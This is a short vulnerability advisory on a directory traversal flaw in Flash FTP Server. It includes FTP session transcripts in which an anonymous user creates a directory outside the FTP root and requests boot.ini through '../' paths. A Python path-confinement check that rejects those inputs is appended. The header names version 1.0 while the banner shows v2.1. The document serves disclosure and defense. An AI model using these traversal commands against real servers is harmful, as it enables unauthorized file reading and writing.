`Flash FTP Server 1.0 Directory Traversal
Release Date:
January 1, 2004
Systems Affected:
Flash FTP Server is a powerful, flexible, and easy-to-set-up FTP server for all Windows
platforms. Some bugs were found that will allow a malicious user to write and read anywhere
on the disk.
Demonstration:
--------------
[1]
220 Flash FTP Server v2.1 ready...
user anonymous
331 Password required for anonymous.
pass
230 User anonymous logged in.
pwd
257 "/C:/ftp_root/" is current directory.
mkd /../../../../../../../owned
257 'C:\..\..\..\..\..\..\..\owned': directory created.
[2]
220 Flash FTP Server v2.1 ready...
user anonymous
331 Password required for anonymous.
pass
230 User anonymous logged in.
ftp> get /../../../../../../../../boot.ini
Suggestions:
Allow only trusted users access to systems. Log creation of files/directories on systems
to identify malicious users.
Patch:
Not yet available
Credit:
dr_insane
http://members.lycos.co.uk/r34ct/
`
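A server-side confinement check that would reject both requests in the demonstration, as an added example (not code from Flash FTP Server or from the advisory's author). The names `resolve_in_root`, `is_escape` and `PathEscape` are assumptions made for illustration; the root `C:\ftp_root` is taken from the PWD reply above.

```python
import ntpath  # Windows path rules, usable on any platform

FTP_ROOT = r"C:\ftp_root"  # root reported by the PWD reply in the advisory


class PathEscape(Exception):
    """Client path resolves outside the FTP root."""


def resolve_in_root(arg, cwd="/", root=FTP_ROOT):
    """Map an FTP path argument to a Windows path confined to root.

    cwd is the session's virtual directory; "/" means the root itself.
    The check is lexical: a real server must also resolve junctions and
    symlinks before opening the file (assumption: none exist here).
    """
    if "\x00" in arg:
        raise PathEscape("NUL byte in path")
    virtual = arg.replace("\\", "/")  # Windows accepts both separators
    if not virtual.startswith("/"):
        virtual = cwd.rstrip("/") + "/" + virtual
    segments = [s for s in virtual.split("/") if s not in ("", ".")]
    # A colon would let ntpath.join switch drives or name a data stream.
    if any(":" in s for s in segments):
        raise PathEscape("colon in path segment: %r" % arg)
    root_norm = ntpath.normpath(root)
    candidate = ntpath.normpath(ntpath.join(root_norm, *segments))
    # Compare case-insensitively, and require a separator after the root so
    # that C:\ftp_root_evil does not pass as a child of C:\ftp_root.
    cand_key = ntpath.normcase(candidate)
    root_key = ntpath.normcase(root_norm)
    if cand_key != root_key and not cand_key.startswith(root_key + "\\"):
        raise PathEscape("%r resolves to %s" % (arg, candidate))
    return candidate


def is_escape(arg, cwd="/"):
    """True when the argument would leave the FTP root."""
    try:
        resolve_in_root(arg, cwd)
    except PathEscape:
        return True
    return False


if __name__ == "__main__":
    # The two arguments from the advisory's demonstration, plus a benign one.
    for arg in ("/../../../../../../../owned",
                "/../../../../../../../../boot.ini",
                "pub/readme.txt"):
        print(arg, "->", "REJECT" if is_escape(arg) else resolve_in_root(arg))
```

Logging each `PathEscape` together with the session's user and source address gives the audit trail the Suggestions section asks for.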